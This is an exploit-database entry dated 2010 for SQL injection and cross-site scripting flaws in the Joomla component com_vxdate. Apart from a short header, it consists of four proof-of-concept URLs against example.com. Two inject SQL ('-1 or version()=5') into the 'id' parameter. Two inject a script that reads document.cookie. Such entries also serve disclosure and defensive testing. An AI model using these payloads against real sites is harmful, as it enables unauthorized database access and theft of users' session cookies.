Joomla Component com_vxdate XSS / SQL Injection Vulnerability

2010-03-17T00:00:00
ID 1337DAY-ID-11342
Type zdt
Reporter MustLive
Modified 2010-03-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
Joomla Component com_vxdate XSS / SQL Injection Vulnerability
=============================================================

http://www.example.com/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5

http://www.example.com/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5

http://www.example.com/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E




#  0day.today [2018-01-04]  #